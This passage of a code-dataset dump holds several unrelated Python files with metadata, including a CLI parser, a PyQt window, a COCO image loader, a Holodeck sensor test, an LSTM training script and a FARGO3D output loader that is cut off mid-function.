all_commands():\n instance = command_class(subparsers, top_level_parser)\n instance.setup_command()\n\n return top_level_parser\n\n\ndef parse_override_args(extra_args):\n override = {}\n override_settings_indexes = [i for i, j in enumerate(extra_args) if j.startswith('--')]\n for index, item in enumerate(override_settings_indexes):\n v2 = override_settings_indexes[index + 1] if (index + 1) < len(override_settings_indexes) else len(extra_args)\n r = range(item + 1, v2)\n for _ in r:\n values = [extra_args[v] for v in r]\n if len(values) == 1:\n values = values[0]\n override[extra_args[item][2:].upper()] = values\n return override\n\n\ndef cmdline(args=sys.argv):\n # bootstrap logging\n bootstrap()\n\n # Load all plugins\n load_plugins()\n\n skip_settings = []\n args, extra_args = get_argparser().parse_known_args(args[1:])\n\n # Handle common parameters if they're present\n common_args, extra_args = common_parser.parse_known_args(extra_args)\n\n override = parse_override_args(extra_args)\n\n verbose = getattr(args, 'verbose', common_args.verbose)\n config_file = getattr(args, 'config_file', common_args.config_file)\n\n logger = logging.getLogger('engineer')\n if verbose >= 2:\n logger.removeHandler(get_console_handler(logging.WARNING))\n logger.addHandler(get_console_handler(logging.DEBUG))\n elif verbose == 1:\n logger.removeHandler(get_console_handler(logging.WARNING))\n logger.addHandler(get_console_handler(logging.INFO))\n else:\n pass # WARNING level is added by default in bootstrap method\n\n if args.parser_name in skip_settings or (hasattr(args, 'need_settings') and not args.need_settings):\n pass\n else: # try loading settings\n try:\n from engineer.conf import settings\n\n if config_file is None:\n default_settings_file = path.getcwd() / 'config.yaml'\n logger.info(\"No '--settings' parameter specified, defaulting to %s.\" % default_settings_file)\n settings.reload(default_settings_file, override)\n else:\n settings.reload(config_file, override)\n except Exception as e:\n logger.error(e.message)\n exit()\n\n # noinspection PyBroadException\n try:\n if hasattr(args, 'function'):\n args.function(args)\n elif hasattr(args, 'func'):\n args.func(args)\n elif hasattr(args, 'handler_function'):\n args.handler_function(args)\n else:\n args.handle(args)\n except Exception as e:\n logger.exception(\"Unexpected error: %s\" % e.message)\n\n exit()\n","sub_path":"engineer/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"369635912","text":"from PyQt4 import QtGui, QtCore, uic\nfrom pyqtgraph.dockarea import DockArea, Dock\nimport random\nfrom datetime import datetime\nimport os\nfrom widgets.ZMQSubscriber import ZMQSubscriber\n\nmain_package_dir = os.path.join(os.path.dirname(__file__), os.pardir)\nui_filename = os.path.join(main_package_dir, \"ui/MainWindow.ui\")\nUi_MainWindow, QMainWindow = uic.loadUiType(ui_filename)\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n \"\"\"The only window of the application.\"\"\"\n\n def __init__(self, settings):\n super(MainWindow, self).__init__()\n self.settings = settings\n\n self.setupUi(self)\n\n self.dock_area = DockArea()\n self.setCentralWidget(self.dock_area)\n\n self.createDocks()\n\n self.loadSettings()\n\n def createDocks(self):\n self.zmq_subscriber = ZMQSubscriber(self.settings, self)\n self.zmq_subscriber_dock = Dock('Subscriber',\n widget=self.zmq_subscriber)\n self.dock_area.addDock(self.zmq_subscriber_dock)\n\n def loadSettings(self):\n \"\"\"Load window state from self.settings\"\"\"\n\n self.settings.beginGroup('mainwindow')\n geometry = self.settings.value('geometry').toByteArray()\n state = self.settings.value('windowstate').toByteArray()\n dock_string = str(self.settings.value('dockstate').toString())\n if dock_string is not \"\":\n dock_state = eval(dock_string)\n self.dock_area.restoreState(dock_state)\n self.settings.endGroup()\n\n self.restoreGeometry(geometry)\n self.restoreState(state)\n\n def saveSettings(self):\n \"\"\"Save window state to self.settings.\"\"\"\n self.settings.beginGroup('mainwindow')\n self.settings.setValue('geometry', self.saveGeometry())\n self.settings.setValue('windowstate', self.saveState())\n dock_state = self.dock_area.saveState()\n # dock_state returned here is a python dictionary. Coundn't find a good\n # way to save dicts in QSettings, hence just using representation\n # of it.\n self.settings.setValue('dockstate', repr(dock_state))\n self.settings.endGroup()\n\n def closeEvent(self, event):\n self.zmq_subscriber.saveSettings()\n self.saveSettings()\n","sub_path":"streamlogger/widgets/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529015919","text":"\nimport os\nos.environ[\"THEANO_FLAGS\"] = \"mode=FAST_RUN,device=cpu,floatX=float32\"\nimport glob\nimport pickle as pkl\nimport numpy as np\nimport theano\nimport PIL.Image as Image\nclass coco_loader(object):\n\n def __init__(\n self,\n mscoco=\"C:/Users/user/project_dumesnil/\",\n input=\"train2014\",\n target=\"train2014\",\n caption_path=\"C:/Users/user/project_dumesnil/dict_key_imgID_value_caps_train_and_valid.pkl\"\n ):\n # Parameters:\n # mscoco: string coco folder\n # split : string training folder\n # caption_path: string caption path\n\n print('Loading ' + input + ' data...')\n self.mscoco = mscoco\n self.input_path = os.path.join(mscoco, input)\n self.input_imgs = glob.glob(self.input_path + \"/*.jpg\")\n self.target_path = os.path.join(mscoco, target)\n self.target_imgs = glob.glob(self.target_path + \"/*.jpg\")\n caption_path = os.path.join(mscoco, caption_path)\n with open(caption_path, 'rb') as fd:\n caption_dict = pkl.load(fd)\n self.caption_dict = caption_dict\n self.x = np.array(0)\n self.y = np.array(0)\n\n\n\n def load_items(self, batch_idx, batch_size, depth_input, transpose_x=True, transpose_y=True):\n batch_input_imgs = self.input_imgs[batch_idx*batch_size:(batch_idx+1)*batch_size]\n batch_target_imgs = self.target_imgs[batch_idx*batch_size:(batch_idx+1)*batch_size]\n res_input = [self.load_item(i, input_path, depth_input) for i, input_path in enumerate(batch_input_imgs)]\n res_target = [self.load_item(i, target_path, 32) for i, target_path in enumerate(batch_target_imgs)]\n #remove None and unzip the list\n self.x, cap_x, cap_id_x = zip(*[x for x in res_input if x is not None])\n self.y, cap_y, cap_id_y = zip(*[y for y in res_target if y is not None])\n self.x = np.array(self.x)\n self.y = np.array(self.y)\n if(transpose_x):\n self.x = self.x.transpose((0, 3, 1, 2))\n if(transpose_y):\n self.y = self.y.transpose((0, 3, 1, 2))\n #return theano.shared(np.array(self.x), borrow = True), theano.shared(np.array(self.y), borrow = True), cap\n\n return np.array(self.x), np.array(self.y), cap_x, cap_id_x\n\n\n\n def load_item(self, index, img_path, depth_input):\n img = Image.open(img_path)\n img_array = np.array(img)\n cap_id = os.path.basename(img_path)[:-4]\n\n # create 32x32 black squre in the middle of the image\n center = (int(np.floor(img_array.shape[0] / 2.)), int(np.floor(img_array.shape[1] / 2.)))\n if len(img_array.shape) == 3:\n image = np.copy(img_array)\n if depth_input < 32:\n image[depth_input:64-depth_input, depth_input:64-depth_input, :] = 0\n else:\n # skip gray images\n return None\n #return the normalized values\n return image.astype('float32')/255., self.caption_dict[cap_id], cap_id\n","sub_path":"coco_loader.py","file_name":"coco_loader.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"649625742","text":"listax = []\nwhile True:\n n = int(input(\"Digite 1 número para adicionar na lista X: (0 para sair): \"))\n if n == 0:\n break\n listax.append(n)\nlistay = []\nwhile True:\n n = int(input(\"Digite 1 número para adicionar na lista Y: (0 para sair): \"))\n if n == 0:\n break\n listay.append(n)\nlistaz = listax[:]\nlistaz.extend(listay)\n\nx = 0\nwhile x < len(listaz):\n print(\"({}) {}\".format(x, listaz[x]))\n x += 1","sub_path":"cap06/ex-06-02.py","file_name":"ex-06-02.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"261561407","text":"import uuid\nimport copy\n\nimport holodeck\n\nconfigs = {\n \"AndroidAgent\": {\n \"name\": \"test_android_joint_sensor\",\n \"world\": \"TestWorld\",\n \"main_agent\": \"android0\",\n \"agents\": [\n {\n \"agent_name\": \"android0\",\n \"agent_type\": \"AndroidAgent\",\n \"sensors\": [\n {\n \"sensor_type\": \"JointRotationSensor\",\n }\n ],\n \"control_scheme\": 1, # Max Torque control scheme\n \"location\": [0, 0, 5]\n }\n ]\n },\n\n \"HandAgent\": {\n \"name\": \"test_android_joint_sensor\",\n \"world\": \"TestWorld\",\n \"main_agent\": \"hand0\",\n \"agents\": [\n {\n \"agent_name\": \"hand0\",\n \"agent_type\": \"HandAgent\",\n \"sensors\": [\n {\n \"sensor_type\": \"JointRotationSensor\",\n }\n ],\n \"control_scheme\": 1, # Max Torque control scheme, no floating\n \"location\": [0, 0, 5]\n }\n ]\n }\n}\n\n\ndef test_joint_rotation_sensor(joint_agent_type):\n \"\"\"Iterates over every joint provided in has and validates that applying a\n torque to that joint causes the values reported by the JointRotationSensor\n to change.\n\n Args:\n joint_agent_type (tuple of agent type (str) and list of joint names):\n Parameterized input\n\n \"\"\"\n\n agent_type, joints = joint_agent_type\n zeroes = [0 for _ in range(len(joints))]\n\n binary_path = holodeck.packagemanager.get_binary_path_for_package(\"DefaultWorlds\")\n\n with holodeck.environments.HolodeckEnvironment(scenario=configs[agent_type],\n binary_path=binary_path,\n uuid=str(uuid.uuid4())) as env:\n \n # Let the Android collapse into a twitching mess on the ground\n for _ in range(400):\n env.tick()\n \n for i in range(len(joints)):\n name = joints[i]\n\n action = copy.deepcopy(zeroes)\n action[i] = 1\n\n # Sample the joint rotation before torquing it\n pre_rotation = env.step(action)[0][\"JointRotationSensor\"][i]\n\n # Torque it for a few ticks\n for _ in range(10):\n env.step(action)\n \n # Sample it\n post_rotation_1 = env.step(action)[0][\"JointRotationSensor\"][i]\n\n # Torque it in the opposite direction for a bit to make sure it wasn't\n # maxed out in the positive direction before\n\n action[i] = -1\n for _ in range(10):\n env.step(action)\n \n post_rotation_2 = env.step(action)[0][\"JointRotationSensor\"][i]\n\n # print(\"{} {}/{}\".format(name, abs(pre_rotation - post_rotation_1), abs(pre_rotation - post_rotation_2)))\n\n if \"foot\" in name:\n # Ugly, disgusting hack. The foot joints behave strangely, I can't figure out why. Skip them for now\n # BYU-PCCL/holodeck#297\n continue\n\n # Make sure the rotation is different\n assert abs(pre_rotation - post_rotation_1) > 1e-3 or \\\n abs(pre_rotation - post_rotation_2) > 1e-3, \\\n \"The rotation for the joint {} (index {}) did not change enough!\"\\\n \"Before: {}, after positive max torque: {}, after negative max torque{}\"\\\n .format(joints[i], i, pre_rotation, post_rotation_1, post_rotation_2)\n \n # Let things settle\n for _ in range(10):\n env.tick()\n\n","sub_path":"tests/sensors/test_joint_rotation_sensor.py","file_name":"test_joint_rotation_sensor.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"139160100","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport time, gc\nimport pandas as pd\nfrom lstm import train_and_test, preprocess, test\nimport numpy as np\nimport torch\nimport os\nimport pickle\nfrom sklearn.model_selection import train_test_split\n\ndef main():\n print(\"Predict Youtube cross genre\")\n directory = 'data/csv/'\n '''df_data, y = preprocess_data(directory, 'train_news_twitter.csv')\n df_test, test_y = preprocess_data(directory, 'youtube_train.csv')\n train_and_test(df_data, y, df_test, test_y, 100, 'youtube')\n\n print(\"Predict News cross genre\")\n directory = 'data/csv/'\n df_data, y = preprocess_data(directory, 'train_youtube_twitter.csv')\n df_test, test_y = preprocess_data(directory, 'news_train.csv')\n train_and_test(df_data, y, df_test, test_y, 100, 'news')'''\n\n print(\"Predict Twitter cross genre\")\n #directory = 'data/csv/'\n #df_data, y = preprocess_data(directory, 'twitter_train.csv')\n #df_test, test_y = preprocess_data(directory, 'twitter_train.csv')\n #print(\"Shape of train and test: \", df_data.shape, df_test.shape)\n #train_and_test(df_data, y, df_test, test_y, 100, 'twitter')\n\n '''directory = 'data/csv/'\n df_data, y, df_test, test_y = preprocess_data(directory, 'surprise_test.csv', split=True)\n print(\"Shape of train and test: \", df_data.shape, df_test.shape)\n train_and_test(df_data, y, df_test, test_y, 100, 'surprise')'''\n\n #cross genre\n\n '''model = 'models/news_model_cg_0.557.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_cg_0.557.pk', 'rb'))\n corpus.batch_size = 16\n model.batch_size = 16\n df_test, test_y = preprocess_data(directory, 'twitter_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_twitter_2', test=False)\n\n model = 'models/news_model_cg_0.557.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_cg_0.557.pk', 'rb'))\n corpus.batch_size = 10\n model.batch_size = 10\n df_test, test_y = preprocess_data(directory, 'news_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_news_1', test=False)\n\n model = 'models/youtube_model_cg_0.558.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/youtube_corpus_cg_0.558.pk', 'rb'))\n corpus.batch_size = 2\n model.batch_size = 2\n df_test, test_y = preprocess_data(directory, 'youtube_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_youtube_1', test=False)'''\n\n '''model = 'models/news_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_in.pk', 'rb'))\n corpus.batch_size = 1\n model.batch_size = 1\n df_test, test_y = preprocess_data(directory, 'surprise_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_CROSS_kb_1', test=False)'''\n\n #in_genre\n\n model = 'models/youtube_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/youtube_corpus_in.pk', 'rb'))\n corpus.batch_size = 2\n model.batch_size = 2\n df_test, test_y = preprocess_data(directory, 'youtube_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_IN_youtube_1', test=False)\n\n '''model = 'models/news_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/news_corpus_in.pk', 'rb'))\n corpus.batch_size = 10\n model.batch_size = 10\n df_test, test_y = preprocess_data(directory, 'news_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_IN_news_1', test=False)\n\n model = 'models/twitter_model_in.pt'\n model = torch.load(model)\n corpus = pickle.load(open('models/twitter_corpus_in.pk', 'rb'))\n corpus.batch_size = 16\n model.batch_size = 16\n df_test, test_y = preprocess_data(directory, 'twitter_test.csv', predict=True)\n test(df_test, test_y, model, corpus, 'IJS-KD_IN_twitter_1', test=False)'''\n\n\n\ndef preprocess_data(directory, input_file, delimiter=\"\\t\", predict=False, split=False):\n # uncomment this to read data from csv\n data_iterator = pd.read_csv(directory + input_file, encoding=\"utf-8\", delimiter=delimiter, chunksize=1000)\n df_data = pd.DataFrame()\n for sub_data in data_iterator:\n df_data = pd.concat([df_data, sub_data], axis=0)\n gc.collect()\n print(\"Data shape before preprocessing:\", df_data.shape)\n #df_data = df_data[:100]\n\n df_data = preprocess(df_data)\n df_data.to_csv(directory + \"data_preprocessed.csv\", encoding=\"utf8\", sep=\"\\t\", index=False)\n\n print(df_data.columns.tolist())\n\n # shuffle the corpus and optionaly choose the chunk you want to use if you don't want to use the whole thing - will be much faster\n df_data = df_data.sample(frac=1, random_state=1)\n\n print(\"Data shape: \", df_data.shape)\n\n if split:\n df_train, df_test = train_test_split(df_data, test_size=0.1)\n tags = df_train.gender\n m_data = df_train[df_train['gender'] == 'M']\n f_data = df_train[df_train['gender'] == 'F']\n print('Males: ', m_data.shape, 'Females: ', f_data.shape)\n df_train = df_train.drop(['gender'], axis=1)\n y_train = np.array([0 if tmp_y=='M' else 1 for tmp_y in tags])\n\n tags = df_test.gender\n m_data = df_test[df_test['gender'] == 'M']\n f_data = df_test[df_test['gender'] == 'F']\n print('Males: ', m_data.shape, 'Females: ', f_data.shape)\n df_test = df_test.drop(['gender'], axis=1)\n y_test = np.array([0 if tmp_y == 'M' else 1 for tmp_y in tags])\n\n print('All shape: ', df_train.shape, y_train.shape, df_test.shape, y_test.shape)\n\n return df_train, y_train, df_test, y_test\n\n\n\n else:\n if predict:\n tags = df_data.id\n else:\n tags = df_data.gender\n m_data = df_data[df_data['gender'] == 'M']\n f_data = df_data[df_data['gender'] == 'F']\n print('Males: ', m_data.shape, 'Females: ', f_data.shape)\n df_data = df_data.drop(['gender'], axis=1)\n if not predict:\n y = np.array([0 if tmp_y=='M' else 1 for tmp_y in tags])\n else:\n y = np.array([tmp_y for tmp_y in tags])\n return df_data, y\n\n\nif __name__ == '__main__':\n start_time = time.time()\n # run from command line\n # e.g. python3 gender_classification.py --input './pan17-author-profiling-training-dataset-2017-03-10' --output results --language en\n argparser = argparse.ArgumentParser(description='Clin gender evaluation')\n argparser.add_argument('-c', '--input', dest='input', type=str,\n default='data/weebit',\n help='Choose input trainset')\n # args = argparser.parse_args()\n main()\n\n print(\"--- Model creation in minutes ---\", round(((time.time() - start_time) / 60), 2))\n print(\"--- Training & Testing in minutes ---\", round(((time.time() - start_time) / 60), 2))\n\n\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"633728187","text":"age_1 = int(input('Cuantos años tienes?: '))\nage_2 = int(input('Cual es la edad de tu amigo?: '))\n\nif age_1 > age_2:\n diff = age_1 - age_2\n difw = str(diff)\n print('Eres mayor que tu amigo por ' + difw + ' años')\nelif age_1 < age_2:\n diff = age_2 - age_1\n difw = str(diff)\n print('Tu amigo es mayor por ' + difw + ' años')\nelse:\n print('Los dos tienen la misma edad')\n\n","sub_path":"py_basico/age_comparative.py","file_name":"age_comparative.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"185738270","text":"\"\"\"\n// Time Complexity : o(n)\n// Space Complexity : constant\n// Did this code successfully run on Leetcode : yes\n// Any problem you faced while coding this : no\n\n\n// Your code here along with comments explaining your approach\n\"\"\"\n\nclass Solution:\n def candy(self, ratings: List[int]) -> int: #2 pass algorithm, first we check going left to right and then right to left\n candies = [1] * len(ratings) #initially everyone has 1 candy\n \n for i in range(1,len(ratings)): #checking with previous values\n if ratings[i] > ratings[i-1]: #if rating for current is higher, increase the number of candies for current to prev candies + 1\n candies[i] = candies[i-1] + 1\n \n for i in range(len(ratings)-2, -1, -1): #2nd pass, \n if ratings[i] > ratings[i+1]:\n candies[i] = max(candies[i],candies[i+1] + 1) #check if current number of candies is already greater than the right neighbour, else increment by 1\n \n return sum(candies) #return sum \n \n \n ","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"180975450","text":"code_info = (\"fargo3d\", \"2.0\", \"multifluid\")\n\nimport os\nimport re\nimport copy\nimport numpy as np\nimport astropy.units as u\nimport astropy.constants as const\nfrom . import interface\nfrom .. import fluid\nfrom .. import field\nfrom .. import grid\nfrom .. import scalar\nfrom .. import particles\n\n\ndef identify(path):\n try:\n get_data_dir(path)\n return True\n except FileNotFoundError:\n return False\n\n\nvars_2d = {\n \"mass density\": {\n \"pattern\": \"{}dens{}.dat\",\n \"unitpowers\": {\n \"mass\": 1,\n \"length\": -2\n }\n },\n \"energy density\": {\n \"pattern\": \"{}energy{}.dat\",\n \"unitpowers\": {\n \"mass\": 1,\n \"time\": -2\n }\n },\n \"velocity radial\": {\n \"pattern\": \"{}vy{}.dat\",\n \"unitpowers\": {\n \"length\": 1,\n \"time\": -1\n },\n \"interfaces\": [\"r\"],\n },\n \"velocity azimuthal\": {\n \"pattern\": \"{}vx{}.dat\",\n \"unitpowers\": {\n \"length\": 1,\n \"time\": -1\n },\n \"interfaces\": [\"phi\"],\n },\n \"vpolar\": {\n \"pattern\": \"{}vz{}.dat\",\n \"unitpowers\": {\n \"length\": 1,\n \"time\": -1\n },\n \"interfaces\": [\"theta\"],\n },\n \"grainsize\": {\n \"pattern\": \"{}grainsize{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize drift\": {\n \"pattern\": \"{}grainsize_drift{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize frag\": {\n \"pattern\": \"{}grainsize_frag{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize driftfrag\": {\n \"pattern\": \"{}grainsize_driftfrag{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize coag\": {\n \"pattern\": \"{}grainsize_coag{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n }\n}\n\nvars_1d = {\n 'torque planet {}': {\n 'pattern': 'torq_1d_Y_raw_planet_{}.dat',\n 'for each planet': True,\n 'directions': [\"r\"],\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'velocity radial': {\n 'pattern': '{}vy{}.dat',\n 'directions': [\"r\"],\n 'unitpowers': {\n \"mass\": 0,\n \"length\": 1,\n \"time\": -1\n }\n },\n 'velocity azimuthal': {\n 'pattern': '{}vx{}.dat',\n 'directions': [\"r\"],\n 'unitpowers': {\n \"mass\": 0,\n \"length\": 1,\n \"time\": -1\n }\n },\n}\n\nvars_scalar = {\n 'mass': {\n 'file': 'mass.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1\n }\n },\n 'angular momentum': {\n 'file': 'momx.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -1\n }\n },\n 'kinetic energy azimuthal': {\n 'file': 'ekinx.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'kinetic energy radial': {\n 'file': 'ekiny.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'kinetic energy vertical': {\n 'file': 'ekinz.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'torque planet {}': {\n 'file': 'torq_planet_{}.dat',\n 'for each planet': True,\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n}\n\nplanet_vars_scalar = {\n 'x': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 1,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1\n }\n },\n 'y': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 2,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1\n }\n },\n 'z': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 3,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1\n }\n },\n 'vx': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 4,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1,\n \"time\": -1\n }\n },\n 'vy': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 5,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1,\n \"time\": -1\n }\n },\n 'vz': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 6,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1,\n \"time\": -1\n }\n },\n 'mass': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 7,\n 'timecol': 8,\n 'unitpowers': {\n 'mass': 1\n }\n },\n 'mass': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 9,\n 'timecol': 8,\n 'unitpowers': {\n 'time': -1\n }\n },\n 'time step': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 0,\n 'timecol': 8,\n 'unitpowers': {}\n },\n 'physical time': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 8,\n 'timecol': 8,\n 'unitpowers': {\n \"time\": 1\n }\n },\n ########################################\n ### orbital elements\n 'physical time orbit': {\n 'file': 'orbit{}.dat',\n 'datacol': 0,\n 'timecol': 0,\n 'unitpowers': {\n \"time\": 1\n }\n },\n 'eccentricity': {\n 'file': 'orbit{}.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'semi-major axis': {\n 'file': 'orbit{}.dat',\n 'datacol': 2,\n 'timecol': 0,\n 'unitpowers': {\n \"length\": 1\n }\n },\n 'mean anomaly': {\n 'file': 'orbit{}.dat',\n 'datacol': 3,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'true anomaly': {\n 'file': 'orbit{}.dat',\n 'datacol': 4,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'argument of periapsis': {\n 'file': 'orbit{}.dat',\n 'datacol': 5,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'x-axis rotation angle': {\n 'file': 'orbit{}.dat',\n 'datacol': 6,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'inclination': {\n 'file': 'orbit{}.dat',\n 'datacol': 7,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'ascending node': {\n 'file': 'orbit{}.dat',\n 'datacol': 8,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'longitude of periapsis': {\n 'file': 'orbit{}.dat',\n 'datacol': 9,\n 'timecol': 0,\n 'unitpowers': {}\n },\n}\n\nalias_fields = {\n \"velocity radial\": \"vrad\",\n \"velocity azimuthal\": \"vazimuth\",\n \"total energy density\": \"energy density\"\n}\n\nalias_reduced = {\n \"output time step\": \"analysis time step\",\n \"simulation time\": \"physical time\",\n \"mass\": \"mass\",\n \"angular momentum\": \"angular momentum\",\n \"total energy\": \"total energy\",\n \"internal energy\": \"internal energy\",\n \"kinetic energy\": \"kinetic energy\",\n \"eccentricity\": \"eccentricity\",\n \"periastron\": \"periastron\",\n \"mass flow inner\": \"\",\n \"mass flow outer\": \"\",\n \"mass flow wavedamping\": \"\",\n \"mass flow densityfloor\": \"\"\n}\n\nalias_particle = {\n \"output time step\": \"time step\",\n \"simulation time\": \"physical time\",\n \"argument of periapsis\": \"argument of periapsis\",\n \"velocity\": \"velocity\",\n \"mass\": \"mass\",\n \"angular momentum\": \"angular momentum\",\n \"eccentricity\": \"eccentricity\",\n \"semi-major axis\": \"semi-major axis\"\n}\n\n\ndef var_in_files(varpattern, files):\n p = re.compile(varpattern.replace(\".\", \"\\.\").format(\"\\d+\"))\n for f in files:\n if re.match(p, f):\n return True\n return False\n\n\ndef load_scalar(file, var):\n return [1, 1]\n\n\ndef get_data_dir(path):\n rv = None\n ptrn = re.compile(\"summary\\d+.dat\")\n for root, dirs, files in os.walk(path):\n for f in files:\n m = re.search(ptrn, f)\n if m:\n rv = root\n break\n if rv is None:\n raise FileNotFoundError(\n \"Could not find identifier file 'summary\\d+.dat' in any subfolder of '{}'\"\n .format(path))\n return rv\n\n\ndef find_first_summary(dataDir):\n return \"summary{}.dat\".format(find_first_summary_number(dataDir))\n\n\ndef find_first_summary_number(dataDir):\n return find_summary_numbers(dataDir)[0]\n\n\ndef find_summary_numbers(dataDir):\n ptrn = re.compile(\"summary(\\d+).dat\")\n summaries = []\n for f in os.listdir(dataDir):\n m = re.search(ptrn, f)\n if m:\n n = int(m.groups()[0])\n summaries.append(n)\n summaries.sort()\n return summaries\n\n\ndef get_unit_from_powers(unitpowers, units):\n unit = 1.0\n for u, p in unitpowers.items():\n unit = unit * units[u]**p\n return unit\n\n\nclass Loader(interface.Interface):\n\n code_info = code_info\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data_dir = get_data_dir(self.path)\n self.output_times = np.array([])\n self.fine_output_times = np.array([])\n\n def scout(self):\n self.get_domain_size()\n self.get_parameters()\n self.get_units()\n self.apply_units()\n self.load_times()\n self.get_planets()\n self.get_fluids()\n self.get_fields()\n self.get_scalars()\n self.get_nbodysystems()\n self.register_alias()\n\n def get_parameters(self):\n self.parameters = getParamsFromNthSummary(\n self.data_dir, find_first_summary_number(self.data_dir))\n\n def apply_units(self):\n for vardict in [planet_vars_scalar, vars_2d, vars_1d, vars_scalar]:\n for var, info in vardict.items():\n info[\"unit\"] = get_unit_from_powers(info[\"unitpowers\"],\n self.units)\n\n def register_alias(self):\n for particlegroup in self.particlegroups:\n particlegroup.alias.register_dict(alias_particle)\n for planet in self.planets:\n planet.alias.register_dict(alias_particle)\n for name, fluid in self.fluids.items():\n fluid.alias.register_dict(alias_fields)\n fluid.alias.register_dict(alias_reduced)\n\n def get_nbodysystems(self):\n pass\n\n def get_planets(self):\n planet_ids = []\n p = re.compile(\"bigplanet(\\d).dat\")\n for s in os.listdir(self.data_dir):\n m = re.match(p, s)\n if m:\n planet_ids.append(m.groups()[0])\n planet_ids.sort()\n # create planets\n self.planets = []\n for pid in planet_ids:\n self.planets.append(particles.Planet(str(pid), pid))\n # add variables to planets\n for pid, planet in zip(planet_ids, self.planets):\n for varname in planet_vars_scalar:\n info = planet_vars_scalar[varname]\n datafile = os.path.join(self.data_dir,\n info[\"file\"].format(pid))\n loader = ScalarLoader(varname, datafile, info, self)\n planet.register_variable(varname, loader)\n\n def get_fluids(self):\n ptrn = re.compile(\"output(.*)\\.dat\")\n fluid_names = [\n m.groups()[0]\n for m in (re.search(ptrn, f) for f in os.listdir(self.data_dir))\n if m is not None\n ]\n for name in fluid_names:\n self.fluids[name] = fluid.Fluid(name)\n\n def get_fields(self):\n self.get_fields_2d()\n self.get_fields_1d()\n\n def get_fields_2d(self):\n files = os.listdir(self.data_dir)\n for fluidname in self.fluids.keys():\n for varname, info in vars_2d.items():\n info_formatted = copy.deepcopy(info)\n info_formatted[\"pattern\"] = info_formatted[\"pattern\"].format(\n fluidname, \"{}\")\n if 